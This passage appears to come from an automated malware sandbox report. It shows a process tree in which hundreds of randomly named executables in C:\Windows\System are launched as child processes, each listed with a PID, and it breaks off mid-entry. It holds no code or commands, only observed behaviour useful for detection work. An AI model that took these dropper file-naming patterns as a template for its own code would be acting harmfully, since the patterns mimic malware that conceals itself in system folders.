- C:\Windows\System\iddoAvQ.exe
  C:\Windows\System\iddoAvQ.exe
  2⤵
  PID:4980
- C:\Windows\System\vVSvnWx.exe
  C:\Windows\System\vVSvnWx.exe
  2⤵
  PID:8088
- C:\Windows\System\YUgazPZ.exe
  C:\Windows\System\YUgazPZ.exe
  2⤵
  PID:7928
- C:\Windows\System\KJRRYrw.exe
  C:\Windows\System\KJRRYrw.exe
  2⤵
  PID:8232
- C:\Windows\System\EkEyFub.exe
  C:\Windows\System\EkEyFub.exe
  2⤵
  PID:8248
- C:\Windows\System\XGClTuc.exe
  C:\Windows\System\XGClTuc.exe
  2⤵
  PID:8272
- C:\Windows\System\FXIlKcP.exe
  C:\Windows\System\FXIlKcP.exe
  2⤵
  PID:8296
- C:\Windows\System\gwyfNEs.exe
  C:\Windows\System\gwyfNEs.exe
  2⤵
  PID:8320
- C:\Windows\System\zfzbKJT.exe
  C:\Windows\System\zfzbKJT.exe
  2⤵
  PID:8336
- C:\Windows\System\OUFXNYR.exe
  C:\Windows\System\OUFXNYR.exe
  2⤵
  PID:8364
- C:\Windows\System\tJQkjBK.exe
  C:\Windows\System\tJQkjBK.exe
  2⤵
  PID:8412
- C:\Windows\System\VVAPYbI.exe
  C:\Windows\System\VVAPYbI.exe
  2⤵
  PID:8440
- C:\Windows\System\DWAqbCw.exe
  C:\Windows\System\DWAqbCw.exe
  2⤵
  PID:8456
- C:\Windows\System\ATNfwrw.exe
  C:\Windows\System\ATNfwrw.exe
  2⤵
  PID:8476
- C:\Windows\System\VebgTRn.exe
  C:\Windows\System\VebgTRn.exe
  2⤵
  PID:8500
- C:\Windows\System\EvxyUbd.exe
  C:\Windows\System\EvxyUbd.exe
  2⤵
  PID:8520
- C:\Windows\System\rFbPgvz.exe
  C:\Windows\System\rFbPgvz.exe
  2⤵
  PID:8584
- C:\Windows\System\GCRlCDj.exe
  C:\Windows\System\GCRlCDj.exe
  2⤵
  PID:8604
- C:\Windows\System\VflCyPh.exe
  C:\Windows\System\VflCyPh.exe
  2⤵
  PID:8628
- C:\Windows\System\hAFmrrf.exe
  C:\Windows\System\hAFmrrf.exe
  2⤵
  PID:8668
- C:\Windows\System\RBgzgnr.exe
  C:\Windows\System\RBgzgnr.exe
  2⤵
  PID:8712
- C:\Windows\System\tQzDTcS.exe
  C:\Windows\System\tQzDTcS.exe
  2⤵
  PID:8736
- C:\Windows\System\JKjJAwY.exe
  C:\Windows\System\JKjJAwY.exe
  2⤵
  PID:8756
- C:\Windows\System\qsURLdI.exe
  C:\Windows\System\qsURLdI.exe
  2⤵
  PID:8780
- C:\Windows\System\mfuIiGS.exe
  C:\Windows\System\mfuIiGS.exe
  2⤵
  PID:8824
- C:\Windows\System\CvBLEJk.exe
  C:\Windows\System\CvBLEJk.exe
  2⤵
  PID:8840
- C:\Windows\System\OShQtny.exe
  C:\Windows\System\OShQtny.exe
  2⤵
  PID:8864
- C:\Windows\System\lPFjeXI.exe
  C:\Windows\System\lPFjeXI.exe
  2⤵
  PID:8900
- C:\Windows\System\yrJuuFh.exe
  C:\Windows\System\yrJuuFh.exe
  2⤵
  PID:8920
- C:\Windows\System\GAsDAOY.exe
  C:\Windows\System\GAsDAOY.exe
  2⤵
  PID:8940
- C:\Windows\System\ufkeVqE.exe
  C:\Windows\System\ufkeVqE.exe
  2⤵
  PID:8972
- C:\Windows\System\wanVxnX.exe
  C:\Windows\System\wanVxnX.exe
  2⤵
  PID:8988
- C:\Windows\System\Vbuzxrz.exe
  C:\Windows\System\Vbuzxrz.exe
  2⤵
  PID:9024
- C:\Windows\System\CHOUGPw.exe
  C:\Windows\System\CHOUGPw.exe
  2⤵
  PID:9040
- C:\Windows\System\jjAtEVj.exe
  C:\Windows\System\jjAtEVj.exe
  2⤵
  PID:9056
- C:\Windows\System\IFUnmQc.exe
  C:\Windows\System\IFUnmQc.exe
  2⤵
  PID:9108
- C:\Windows\System\oZMFFZg.exe
  C:\Windows\System\oZMFFZg.exe
  2⤵
  PID:9176
- C:\Windows\System\LrBPzsu.exe
  C:\Windows\System\LrBPzsu.exe
  2⤵
  PID:9192
- C:\Windows\System\SMxmbXA.exe
  C:\Windows\System\SMxmbXA.exe
  2⤵
  PID:7972
- C:\Windows\System\APSjMvc.exe
  C:\Windows\System\APSjMvc.exe
  2⤵
  PID:8212
- C:\Windows\System\GwBKoHt.exe
  C:\Windows\System\GwBKoHt.exe
  2⤵
  PID:8216
- C:\Windows\System\oJOVNpN.exe
  C:\Windows\System\oJOVNpN.exe
  2⤵
  PID:8308
- C:\Windows\System\pUnNICk.exe
  C:\Windows\System\pUnNICk.exe
  2⤵
  PID:8384
- C:\Windows\System\mxGgVXL.exe
  C:\Windows\System\mxGgVXL.exe
  2⤵
  PID:8516
- C:\Windows\System\QrPKqWp.exe
  C:\Windows\System\QrPKqWp.exe
  2⤵
  PID:8580
- C:\Windows\System\MLJCkkl.exe
  C:\Windows\System\MLJCkkl.exe
  2⤵
  PID:8612
- C:\Windows\System\mGOvSWd.exe
  C:\Windows\System\mGOvSWd.exe
  2⤵
  PID:8684
- C:\Windows\System\LkMggVk.exe
  C:\Windows\System\LkMggVk.exe
  2⤵
  PID:8748
- C:\Windows\System\KMvcxTZ.exe
  C:\Windows\System\KMvcxTZ.exe
  2⤵
  PID:8876
- C:\Windows\System\enknSqj.exe
  C:\Windows\System\enknSqj.exe
  2⤵
  PID:8848
- C:\Windows\System\bWkNKck.exe
  C:\Windows\System\bWkNKck.exe
  2⤵
  PID:8912
- C:\Windows\System\dklNTyb.exe
  C:\Windows\System\dklNTyb.exe
  2⤵
  PID:8984
- C:\Windows\System\kNhuPko.exe
  C:\Windows\System\kNhuPko.exe
  2⤵
  PID:9032
- C:\Windows\System\xOwkana.exe
  C:\Windows\System\xOwkana.exe
  2⤵
  PID:9100
- C:\Windows\System\eoGvpUM.exe
  C:\Windows\System\eoGvpUM.exe
  2⤵
  PID:9200
- C:\Windows\System\GsRpdUn.exe
  C:\Windows\System\GsRpdUn.exe
  2⤵
  PID:8256
- C:\Windows\System\JujODBm.exe
  C:\Windows\System\JujODBm.exe
  2⤵
  PID:8360
- C:\Windows\System\QOkazUL.exe
  C:\Windows\System\QOkazUL.exe
  2⤵
  PID:8512
- C:\Windows\System\XIJuEXA.exe
  C:\Windows\System\XIJuEXA.exe
  2⤵
  PID:8832
- C:\Windows\System\sCJgHlk.exe
  C:\Windows\System\sCJgHlk.exe
  2⤵
  PID:8836
- C:\Windows\System\vSDbHyG.exe
  C:\Windows\System\vSDbHyG.exe
  2⤵
  PID:9052
- C:\Windows\System\ecnjwey.exe
  C:\Windows\System\ecnjwey.exe
  2⤵
  PID:9212
- C:\Windows\System\QKVUkdu.exe
  C:\Windows\System\QKVUkdu.exe
  2⤵
  PID:8328
- C:\Windows\System\GxstUHt.exe
  C:\Windows\System\GxstUHt.exe
  2⤵
  PID:8052
- C:\Windows\System\zxlwORS.exe
  C:\Windows\System\zxlwORS.exe
  2⤵
  PID:9092
- C:\Windows\System\wykMfIV.exe
  C:\Windows\System\wykMfIV.exe
  2⤵
  PID:9080
- C:\Windows\System\dSnNcic.exe
  C:\Windows\System\dSnNcic.exe
  2⤵
  PID:9256
- C:\Windows\System\kkNtjVK.exe
  C:\Windows\System\kkNtjVK.exe
  2⤵
  PID:9276
- C:\Windows\System\xDRNffj.exe
  C:\Windows\System\xDRNffj.exe
  2⤵
  PID:9300
- C:\Windows\System\TLvrLYs.exe
  C:\Windows\System\TLvrLYs.exe
  2⤵
  PID:9320
- C:\Windows\System\ITZApIQ.exe
  C:\Windows\System\ITZApIQ.exe
  2⤵
  PID:9360
- C:\Windows\System\mvzrFqX.exe
  C:\Windows\System\mvzrFqX.exe
  2⤵
  PID:9376
- C:\Windows\System\wvlKYSd.exe
  C:\Windows\System\wvlKYSd.exe
  2⤵
  PID:9464
- C:\Windows\System\WTirorr.exe
  C:\Windows\System\WTirorr.exe
  2⤵
  PID:9484
- C:\Windows\System\xyGBGPy.exe
  C:\Windows\System\xyGBGPy.exe
  2⤵
  PID:9504
- C:\Windows\System\YqzknyP.exe
  C:\Windows\System\YqzknyP.exe
  2⤵
  PID:9520
- C:\Windows\System\miCuLHN.exe
  C:\Windows\System\miCuLHN.exe
  2⤵
  PID:9540
- C:\Windows\System\pAkhVNi.exe
  C:\Windows\System\pAkhVNi.exe
  2⤵
  PID:9556
- C:\Windows\System\GCuVvAb.exe
  C:\Windows\System\GCuVvAb.exe
  2⤵
  PID:9648
- C:\Windows\System\MkQgaSv.exe
  C:\Windows\System\MkQgaSv.exe
  2⤵
  PID:9668
- C:\Windows\System\SAMgIWX.exe
  C:\Windows\System\SAMgIWX.exe
  2⤵
  PID:9684
- C:\Windows\System\XuXKylr.exe
  C:\Windows\System\XuXKylr.exe
  2⤵
  PID:9700
- C:\Windows\System\OWjvrtP.exe
  C:\Windows\System\OWjvrtP.exe
  2⤵
  PID:9720
- C:\Windows\System\UclSHQe.exe
  C:\Windows\System\UclSHQe.exe
  2⤵
  PID:9736
- C:\Windows\System\SXAybJA.exe
  C:\Windows\System\SXAybJA.exe
  2⤵
  PID:9752
- C:\Windows\System\iSbVQSv.exe
  C:\Windows\System\iSbVQSv.exe
  2⤵
  PID:9768
- C:\Windows\System\GKdrdrS.exe
  C:\Windows\System\GKdrdrS.exe
  2⤵
  PID:9784
- C:\Windows\System\ajivJgr.exe
  C:\Windows\System\ajivJgr.exe
  2⤵
  PID:9800
- C:\Windows\System\EtraxHx.exe
  C:\Windows\System\EtraxHx.exe
  2⤵
  PID:9816
- C:\Windows\System\HJLfAhi.exe
  C:\Windows\System\HJLfAhi.exe
  2⤵
  PID:9832
- C:\Windows\System\mpTVGsf.exe
  C:\Windows\System\mpTVGsf.exe
  2⤵
  PID:9848
- C:\Windows\System\jNnGaIL.exe
  C:\Windows\System\jNnGaIL.exe
  2⤵
  PID:9944
- C:\Windows\System\EByOfbm.exe
  C:\Windows\System\EByOfbm.exe
  2⤵
  PID:9964
- C:\Windows\System\NAQpcgT.exe
  C:\Windows\System\NAQpcgT.exe
  2⤵
  PID:9988
- C:\Windows\System\uTcCsQn.exe
  C:\Windows\System\uTcCsQn.exe
  2⤵
  PID:10004
- C:\Windows\System\keudMXx.exe
  C:\Windows\System\keudMXx.exe
  2⤵
  PID:10024
- C:\Windows\System\zyKOSlD.exe
  C:\Windows\System\zyKOSlD.exe
  2⤵
  PID:10092
- C:\Windows\System\guAjbQg.exe
  C:\Windows\System\guAjbQg.exe
  2⤵
  PID:10112
- C:\Windows\System\DAcSwZv.exe
  C:\Windows\System\DAcSwZv.exe
  2⤵
  PID:10132
- C:\Windows\System\pNCkmKa.exe
  C:\Windows\System\pNCkmKa.exe
  2⤵
  PID:10160
- C:\Windows\System\DAWfeIg.exe
  C:\Windows\System\DAWfeIg.exe
  2⤵
  PID:10184
- C:\Windows\System\qoQWXQq.exe
  C:\Windows\System\qoQWXQq.exe
  2⤵
  PID:10204
- C:\Windows\System\rlJQvCt.exe
  C:\Windows\System\rlJQvCt.exe
  2⤵
  PID:9268
- C:\Windows\System\qkPZJXP.exe
  C:\Windows\System\qkPZJXP.exe
  2⤵
  PID:9344
- C:\Windows\System\ntNWvhz.exe
  C:\Windows\System\ntNWvhz.exe
  2⤵
  PID:9500
- C:\Windows\System\AIZxERU.exe
  C:\Windows\System\AIZxERU.exe
  2⤵
  PID:9448
- C:\Windows\System\YFgDAuc.exe
  C:\Windows\System\YFgDAuc.exe
  2⤵
  PID:9604
- C:\Windows\System\KpAQzFk.exe
  C:\Windows\System\KpAQzFk.exe
  2⤵
  PID:9808
- C:\Windows\System\YIVUVmS.exe
  C:\Windows\System\YIVUVmS.exe
  2⤵
  PID:9828
- C:\Windows\System\fbVfHFY.exe
  C:\Windows\System\fbVfHFY.exe
  2⤵
  PID:9640
- C:\Windows\System\HKKECJD.exe
  C:\Windows\System\HKKECJD.exe
  2⤵
  PID:9712
- C:\Windows\System\apQfKJc.exe
  C:\Windows\System\apQfKJc.exe
  2⤵
  PID:10100
- C:\Windows\System\bBgfURi.exe
  C:\Windows\System\bBgfURi.exe
  2⤵
  PID:9840
- C:\Windows\System\jjVeHKS.exe
  C:\Windows\System\jjVeHKS.exe
  2⤵
  PID:9868
- C:\Windows\System\XnOpGeL.exe
  C:\Windows\System\XnOpGeL.exe
  2⤵
  PID:10020
- C:\Windows\System\vNEZvhh.exe
  C:\Windows\System\vNEZvhh.exe
  2⤵
  PID:10148
- C:\Windows\System\zvWiuLv.exe
  C:\Windows\System\zvWiuLv.exe
  2⤵
  PID:10180
- C:\Windows\System\SYYnoKT.exe
  C:\Windows\System\SYYnoKT.exe
  2⤵
  PID:9288
- C:\Windows\System\ApXWflT.exe
  C:\Windows\System\ApXWflT.exe
  2⤵
  PID:9612
- C:\Windows\System\WJjphOb.exe
  C:\Windows\System\WJjphOb.exe
  2⤵
  PID:9624
- C:\Windows\System\PAPhEIA.exe
  C:\Windows\System\PAPhEIA.exe
  2⤵
  PID:9928
- C:\Windows\System\QDmrfwv.exe
  C:\Windows\System\QDmrfwv.exe
  2⤵
  PID:9696
- C:\Windows\System\fLOfymU.exe
  C:\Windows\System\fLOfymU.exe
  2⤵
  PID:10140
- C:\Windows\System\FrnyppM.exe
  C:\Windows\System\FrnyppM.exe
  2⤵
  PID:9980
- C:\Windows\System\mJfxdvr.exe
  C:\Windows\System\mJfxdvr.exe
  2⤵
  PID:9308
- C:\Windows\System\PKogXwu.exe
  C:\Windows\System\PKogXwu.exe
  2⤵
  PID:9496
- C:\Windows\System\LaOUfMv.exe
  C:\Windows\System\LaOUfMv.exe
  2⤵
  PID:9632
- C:\Windows\System\toUFPXR.exe
  C:\Windows\System\toUFPXR.exe
  2⤵
  PID:9864
- C:\Windows\System\XvxyVHb.exe
  C:\Windows\System\XvxyVHb.exe
  2⤵
  PID:9584
- C:\Windows\System\WzNxmrW.exe
  C:\Windows\System\WzNxmrW.exe
  2⤵
  PID:10244
- C:\Windows\System\jNCmrhZ.exe
  C:\Windows\System\jNCmrhZ.exe
  2⤵
  PID:10260
- C:\Windows\System\RRxnLVk.exe
  C:\Windows\System\RRxnLVk.exe
  2⤵
  PID:10276
- C:\Windows\System\KlgssSF.exe
  C:\Windows\System\KlgssSF.exe
  2⤵
  PID:10324
- C:\Windows\System\yZQfsyb.exe
  C:\Windows\System\yZQfsyb.exe
  2⤵
  PID:10344
- C:\Windows\System\GGNczxe.exe
  C:\Windows\System\GGNczxe.exe
  2⤵
  PID:10388
- C:\Windows\System\lpAyggN.exe
  C:\Windows\System\lpAyggN.exe
  2⤵
  PID:10408
- C:\Windows\System\xUHOYGq.exe
  C:\Windows\System\xUHOYGq.exe
  2⤵
  PID:10440
- C:\Windows\System\MderLHh.exe
  C:\Windows\System\MderLHh.exe
  2⤵
  PID:10464
- C:\Windows\System\gdRYPQl.exe
  C:\Windows\System\gdRYPQl.exe
  2⤵
  PID:10484
- C:\Windows\System\agSDkjJ.exe
  C:\Windows\System\agSDkjJ.exe
  2⤵
  PID:10524
- C:\Windows\System\OhEDYiD.exe
  C:\Windows\System\OhEDYiD.exe
  2⤵
  PID:10540
- C:\Windows\System\eidBvaG.exe
  C:\Windows\System\eidBvaG.exe
  2⤵
  PID:10564
- C:\Windows\System\pdrNnEA.exe
  C:\Windows\System\pdrNnEA.exe
  2⤵
  PID:10592
- C:\Windows\System\VdKHAWS.exe
  C:\Windows\System\VdKHAWS.exe
  2⤵
  PID:10608
- C:\Windows\System\RsxyOEK.exe
  C:\Windows\System\RsxyOEK.exe
  2⤵
  PID:10632
- C:\Windows\System\dwqDJhH.exe
  C:\Windows\System\dwqDJhH.exe
  2⤵
  PID:10696
- C:\Windows\System\EFNLHTM.exe
  C:\Windows\System\EFNLHTM.exe
  2⤵
  PID:10728
- C:\Windows\System\Gyenkgo.exe
  C:\Windows\System\Gyenkgo.exe
  2⤵
  PID:10748
- C:\Windows\System\kcnqhtl.exe
  C:\Windows\System\kcnqhtl.exe
  2⤵
  PID:10772
- C:\Windows\System\PBRZSHr.exe
  C:\Windows\System\PBRZSHr.exe
  2⤵
  PID:10792
- C:\Windows\System\ZFmdJKN.exe
  C:\Windows\System\ZFmdJKN.exe
  2⤵
  PID:10844
- C:\Windows\System\WZXkqpv.exe
  C:\Windows\System\WZXkqpv.exe
  2⤵
  PID:10872
- C:\Windows\System\KziOGDP.exe
  C:\Windows\System\KziOGDP.exe
  2⤵
  PID:10904
- C:\Windows\System\yNCMAec.exe
  C:\Windows\System\yNCMAec.exe
  2⤵
  PID:10920
- C:\Windows\System\OoOPUtS.exe
  C:\Windows\System\OoOPUtS.exe
  2⤵
  PID:10948
- C:\Windows\System\RgdwwMM.exe
  C:\Windows\System\RgdwwMM.exe
  2⤵
  PID:10968
- C:\Windows\System\fqybXuP.exe
  C:\Windows\System\fqybXuP.exe
  2⤵
  PID:11004
- C:\Windows\System\MQOBtSt.exe
  C:\Windows\System\MQOBtSt.exe
  2⤵
  PID:11024
- C:\Windows\System\Prjtrci.exe
  C:\Windows\System\Prjtrci.exe
  2⤵
  PID:11052
- C:\Windows\System\qxAZGco.exe
  C:\Windows\System\qxAZGco.exe
  2⤵
  PID:11080
- C:\Windows\System\KjXzgOV.exe
  C:\Windows\System\KjXzgOV.exe
  2⤵
  PID:11100
- C:\Windows\System\bIwGQed.exe
  C:\Windows\System\bIwGQed.exe
  2⤵
  PID:11132
- C:\Windows\System\OaXqmTe.exe
  C:\Windows\System\OaXqmTe.exe
  2⤵
  PID:11156
- C:\Windows\System\zzKbPUD.exe
  C:\Windows\System\zzKbPUD.exe
  2⤵
  PID:11196
- C:\Windows\System\rCeGkrj.exe
  C:\Windows\System\rCeGkrj.exe
  2⤵
  PID:11236
- C:\Windows\System\mOEnhSZ.exe
  C:\Windows\System\mOEnhSZ.exe
  2⤵
  PID:11252
- C:\Windows\System\NeQJPOL.exe
  C:\Windows\System\NeQJPOL.exe
  2⤵
  PID:10048
- C:\Windows\System\TXKfCYC.exe
  C:\Windows\System\TXKfCYC.exe
  2⤵
  PID:10336
- C:\Windows\System\UyuDkLv.exe
  C:\Windows\System\UyuDkLv.exe
  2⤵
  PID:10404
- C:\Windows\System\dpPZKRh.exe
  C:\Windows\System\dpPZKRh.exe
  2⤵
  PID:10452
- C:\Windows\System\XYVfqwe.exe
  C:\Windows\System\XYVfqwe.exe
  2⤵
  PID:10532
- C:\Windows\System\KKYqnaP.exe
  C:\Windows\System\KKYqnaP.exe
  2⤵
  PID:10644
- C:\Windows\System\pwqmjrs.exe
  C:\Windows\System\pwqmjrs.exe
  2⤵
  PID:10676
- C:\Windows\System\KfpeZeF.exe
  C:\Windows\System\KfpeZeF.exe
  2⤵
  PID:10708
- C:\Windows\System\gMIBtCj.exe
  C:\Windows\System\gMIBtCj.exe
  2⤵
  PID:10744
- C:\Windows\System\GMoqflF.exe
  C:\Windows\System\GMoqflF.exe
  2⤵
  PID:10836
- C:\Windows\System\HIqFpDu.exe
  C:\Windows\System\HIqFpDu.exe
  2⤵
  PID:10916
- C:\Windows\System\SXglYZH.exe
  C:\Windows\System\SXglYZH.exe
  2⤵
  PID:11128
- C:\Windows\System\CBRQFPq.exe
  C:\Windows\System\CBRQFPq.exe
  2⤵
  PID:11092
- C:\Windows\System\lDPYpnT.exe
  C:\Windows\System\lDPYpnT.exe
  2⤵
  PID:11148
- C:\Windows\System\gveKkwD.exe
  C:\Windows\System\gveKkwD.exe
  2⤵
  PID:11244
- C:\Windows\System\uwfsPQm.exe
  C:\Windows\System\uwfsPQm.exe
  2⤵
  PID:10252
- C:\Windows\System\sijCVLK.exe
  C:\Windows\System\sijCVLK.exe
  2⤵
  PID:10432
- C:\Windows\System\MILBICY.exe
  C:\Windows\System\MILBICY.exe
  2⤵
  PID:10560
- C:\Windows\System\peUSORt.exe
  C:\Windows\System\peUSORt.exe
  2⤵
  PID:10692
- C:\Windows\System\BXnAiev.exe
  C:\Windows\System\BXnAiev.exe
  2⤵
  PID:10852
- C:\Windows\System\PDjPFQr.exe
  C:\Windows\System\PDjPFQr.exe
  2⤵
  PID:10980
- C:\Windows\System\YAejtNb.exe
  C:\Windows\System\YAejtNb.exe
  2⤵
  PID:11120
- C:\Windows\System\LzefXYc.exe
  C:\Windows\System\LzefXYc.exe
  2⤵
  PID:10268
- C:\Windows\System\Xhhkipi.exe
  C:\Windows\System\Xhhkipi.exe
  2⤵
  PID:10520
- C:\Windows\System\XlCXWEZ.exe
  C:\Windows\System\XlCXWEZ.exe
  2⤵
  PID:10788
- C:\Windows\System\ubPZpdu.exe
  C:\Windows\System\ubPZpdu.exe
  2⤵
  PID:11208
- C:\Windows\System\TGyqaPq.exe
  C:\Windows\System\TGyqaPq.exe
  2⤵
  PID:11312
- C:\Windows\System\bDtCpML.exe
  C:\Windows\System\bDtCpML.exe
  2⤵
  PID:11336
- C:\Windows\System\ourJkbJ.exe
  C:\Windows\System\ourJkbJ.exe
  2⤵
  PID:11360
- C:\Windows\System\erLEJow.exe
  C:\Windows\System\erLEJow.exe
  2⤵
  PID:11380
- C:\Windows\System\maNKhOP.exe
  C:\Windows\System\maNKhOP.exe
  2⤵
  PID:11404
- C:\Windows\System\FTSKvyd.exe
  C:\Windows\System\FTSKvyd.exe
  2⤵
  PID:11444
- C:\Windows\System\dBToVvE.exe
  C:\Windows\System\dBToVvE.exe
  2⤵
  PID:11488
- C:\Windows\System\qafmDIt.exe
  C:\Windows\System\qafmDIt.exe
  2⤵
  PID:11516
- C:\Windows\System\BTyxGly.exe
  C:\Windows\System\BTyxGly.exe
  2⤵
  PID:11536
- C:\Windows\System\UjdLRAE.exe
  C:\Windows\System\UjdLRAE.exe
  2⤵
  PID:11556
- C:\Windows\System\DUZhpIe.exe
  C:\Windows\System\DUZhpIe.exe
  2⤵
  PID:11580
- C:\Windows\System\rUahbUl.exe
  C:\Windows\System\rUahbUl.exe
  2⤵
  PID:11628
- C:\Windows\System\Ynzrvue.exe
  C:\Windows\System\Ynzrvue.exe
  2⤵
  PID:11652
- C:\Windows\System\PGVTIpd.exe
  C:\Windows\System\PGVTIpd.exe
  2⤵
  PID:11676
- C:\Windows\System\RjmSmaG.exe
  C:\Windows\System\RjmSmaG.exe
  2⤵
  PID:11708
- C:\Windows\System\kEeDNnN.exe
  C:\Windows\System\kEeDNnN.exe
  2⤵
  PID:11728
- C:\Windows\System\DhkXtuT.exe
  C:\Windows\System\DhkXtuT.exe
  2⤵
  PID:11756
- C:\Windows\System\AFBIzNn.exe
  C:\Windows\System\AFBIzNn.exe
  2⤵
  PID:11776
- C:\Windows\System\FKFssgQ.exe
  C:\Windows\System\FKFssgQ.exe
  2⤵
  PID:11836
- C:\Windows\System\UhkvbIZ.exe
  C:\Windows\System\UhkvbIZ.exe
  2⤵
  PID:11860
- C:\Windows\System\UkwKzjj.exe
  C:\Windows\System\UkwKzjj.exe
  2⤵
  PID:11880
- C:\Windows\System\vBDLazm.exe
  C:\Windows\System\vBDLazm.exe
  2⤵
  PID:11928
- C:\Windows\System\aTtzYPt.exe
  C:\Windows\System\aTtzYPt.exe
  2⤵
  PID:11948
- C:\Windows\System\VurerTg.exe
  C:\Windows\System\VurerTg.exe
  2⤵
  PID:11976
- C:\Windows\System\TmVcpOz.exe
  C:\Windows\System\TmVcpOz.exe
  2⤵
  PID:12008
- C:\Windows\System\KFJFDtH.exe
  C:\Windows\System\KFJFDtH.exe
  2⤵
  PID:12040
- C:\Windows\System\aJKXwxd.exe
  C:\Windows\System\aJKXwxd.exe
  2⤵
  PID:12060
- C:\Windows\System\HTUADct.exe
  C:\Windows\System\HTUADct.exe
  2⤵
  PID:12080
- C:\Windows\System\EdYHjKY.exe
  C:\Windows\System\EdYHjKY.exe
  2⤵
  PID:12108
- C:\Windows\System\quosnPZ.exe
  C:\Windows\System\quosnPZ.exe
  2⤵
  PID:12136
- C:\Windows\System\GikJZcS.exe
  C:\Windows\System\GikJZcS.exe
  2⤵
  PID:12172
- C:\Windows\System\inEBAWk.exe
  C:\Windows\System\inEBAWk.exe
  2⤵
  PID:12196
- C:\Windows\System\wQgfHOe.exe
  C:\Windows\System\wQgfHOe.exe
  2⤵
  PID:12224
- C:\Windows\System\QpvRAZv.exe
  C:\Windows\System\QpvRAZv.exe
  2⤵
  PID:12268
- C:\Windows\System\RFgIVYz.exe
  C:\Windows\System\RFgIVYz.exe
  2⤵
  PID:10460
- C:\Windows\System\LxRgZpO.exe
  C:\Windows\System\LxRgZpO.exe
  2⤵
  PID:11304
- C:\Windows\System\avxNBno.exe
  C:\Windows\System\avxNBno.exe
  2⤵
  PID:11324
- C:\Windows\System\JlsXxgC.exe
  C:\Windows\System\JlsXxgC.exe
  2⤵
  PID:11388
- C:\Windows\System\tmeHrzO.exe
  C:\Windows\System\tmeHrzO.exe
  2⤵
  PID:11484
- C:\Windows\System\FydtPXq.exe
  C:\Windows\System\FydtPXq.exe
  2⤵
  PID:11504
- C:\Windows\System\ABzviUy.exe
  C:\Windows\System\ABzviUy.exe
  2⤵
  PID:11644
- C:\Windows\System\DOzZMby.exe
  C:\Windows\System\DOzZMby.exe
  2⤵
  PID:11668
- C:\Windows\System\qAzxZuK.exe
  C:\Windows\System\qAzxZuK.exe
  2⤵
  PID:11736
- C:\Windows\System\JIkDsmV.exe
  C:\Windows\System\JIkDsmV.exe
  2⤵
  PID:11808
- C:\Windows\System\bwglphP.exe
  C:\Windows\System\bwglphP.exe
  2⤵
  PID:11824
- C:\Windows\System\AFyHwtV.exe
  C:\Windows\System\AFyHwtV.exe
  2⤵
  PID:11888
- C:\Windows\System\cSZFtsP.exe
  C:\Windows\System\cSZFtsP.exe
  2⤵
  PID:12032
- C:\Windows\System\UbRBsjv.exe
  C:\Windows\System\UbRBsjv.exe
  2⤵
  PID:12088
- C:\Windows\System\rfFZfgN.exe
  C:\Windows\System\rfFZfgN.exe
  2⤵
  PID:12184
- C:\Windows\System\XKdMIkg.exe
  C:\Windows\System\XKdMIkg.exe
  2⤵
  PID:12212
- C:\Windows\System\RwtEIgm.exe
  C:\Windows\System\RwtEIgm.exe
  2⤵
  PID:12284
- C:\Windows\System\fnzldrv.exe
  C:\Windows\System\fnzldrv.exe
  2⤵
  PID:11268
- C:\Windows\System\bHwRCtX.exe
  C:\Windows\System\bHwRCtX.exe
  2⤵
  PID:11452
- C:\Windows\System\WxgLQCb.exe
  C:\Windows\System\WxgLQCb.exe
  2⤵
  PID:11436
- C:\Windows\System\hGtibqa.exe
  C:\Windows\System\hGtibqa.exe
  2⤵
  PID:11636
- C:\Windows\System\XTCpKSR.exe
  C:\Windows\System\XTCpKSR.exe
  2⤵
  PID:11944
- C:\Windows\System\qjNxtew.exe
  C:\Windows\System\qjNxtew.exe
  2⤵
  PID:12020
- C:\Windows\System\czjtaVt.exe
  C:\Windows\System\czjtaVt.exe
  2⤵
  PID:11696
- C:\Windows\System\bAJdeis.exe
  C:\Windows\System\bAJdeis.exe
  2⤵
  PID:12248
- C:\Windows\System\QmlSjIp.exe
  C:\Windows\System\QmlSjIp.exe
  2⤵
  PID:11524
- C:\Windows\System\BcsONPu.exe
  C:\Windows\System\BcsONPu.exe
  2⤵
  PID:11796
- C:\Windows\System\opoiwic.exe
  C:\Windows\System\opoiwic.exe
  2⤵
  PID:12128
- C:\Windows\System\lsxLwhz.exe
  C:\Windows\System\lsxLwhz.exe
  2⤵
  PID:12304
- C:\Windows\System\oBQRfQo.exe
  C:\Windows\System\oBQRfQo.exe
  2⤵
  PID:12324
- C:\Windows\System\PioRgbk.exe
  C:\Windows\System\PioRgbk.exe
  2⤵
  PID:12372
- C:\Windows\System\ktDETZF.exe
  C:\Windows\System\ktDETZF.exe
  2⤵
  PID:12396
- C:\Windows\System\VHHKGQz.exe
  C:\Windows\System\VHHKGQz.exe
  2⤵
  PID:12424
- C:\Windows\System\uZJGoPa.exe
  C:\Windows\System\uZJGoPa.exe
  2⤵
  PID:12440
- C:\Windows\System\zDGpmnm.exe
  C:\Windows\System\zDGpmnm.exe
  2⤵
  PID:12468
- C:\Windows\System\AvpDvxO.exe
  C:\Windows\System\AvpDvxO.exe
  2⤵
  PID:12524
- C:\Windows\System\tmNYeXz.exe
  C:\Windows\System\tmNYeXz.exe
  2⤵
  PID:12552
- C:\Windows\System\xbkGOth.exe
  C:\Windows\System\xbkGOth.exe
  2⤵
  PID:12568
- C:\Windows\System\dapelMQ.exe
  C:\Windows\System\dapelMQ.exe
  2⤵
  PID:12592
- C:\Windows\System\mbrPnaH.exe
  C:\Windows\System\mbrPnaH.exe
  2⤵
  PID:12636
- C:\Windows\System\poVElrK.exe
  C:\Windows\System\poVElrK.exe
  2⤵
  PID:12664
- C:\Windows\System\ZFmYnEp.exe
  C:\Windows\System\ZFmYnEp.exe
  2⤵
  PID:12712
- C:\Windows\System\rkxwrvd.exe
  C:\Windows\System\rkxwrvd.exe
  2⤵
  PID:12732
- C:\Windows\System\janbukq.exe
  C:\Windows\System\janbukq.exe
  2⤵
  PID:12768
- C:\Windows\System\XIlHJcg.exe
  C:\Windows\System\XIlHJcg.exe
  2⤵
  PID:12792
- C:\Windows\System\FOhSOBt.exe
  C:\Windows\System\FOhSOBt.exe
  2⤵
  PID:12812
- C:\Windows\System\pDKKqiP.exe
  C:\Windows\System\pDKKqiP.exe
  2⤵
  PID:12832
- C:\Windows\System\GGiCKXo.exe
  C:\Windows\System\GGiCKXo.exe
  2⤵
  PID:12864
- C:\Windows\System\ZwVcqLW.exe
  C:\Windows\System\ZwVcqLW.exe
  2⤵
  PID:12884
- C:\Windows\System\mdSxseQ.exe
  C:\Windows\System\mdSxseQ.exe
  2⤵
  PID:12908
- C:\Windows\System\JbgFRdG.exe
